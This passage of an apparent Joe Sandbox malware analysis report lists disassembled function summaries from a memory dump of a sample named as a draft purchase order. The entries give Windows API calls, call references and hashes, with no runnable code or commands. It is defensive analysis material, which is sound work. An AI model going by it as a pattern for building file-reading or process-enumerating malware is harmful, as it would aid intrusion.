                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /stext
                                                                                • API String ID: 2081463915-3817206916
                                                                                • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 2445788494-0
                                                                                • Opcode ID: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                • Opcode Fuzzy Hash: f98f4580e944ff1394539a417ce627da6ec9f8ae179723ff754f94650361ffdf
                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                APIs
                                                                                Strings
                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: malloc
                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                • API String ID: 2803490479-1168259600
                                                                                • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemset
                                                                                • String ID:
                                                                                • API String ID: 1065087418-0
                                                                                • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                • String ID:
                                                                                • API String ID: 1381354015-0
                                                                                • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004301AD
                                                                                • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1297977491-0
                                                                                • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                APIs
                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                • String ID:
                                                                                • API String ID: 2154303073-0
                                                                                • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                APIs
                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3150196962-0
                                                                                • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                APIs
                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 3154509469-0
                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                APIs
                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                • String ID:
                                                                                • API String ID: 4232544981-0
                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                APIs
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$FileModuleName
                                                                                • String ID:
                                                                                • API String ID: 3859505661-0
                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
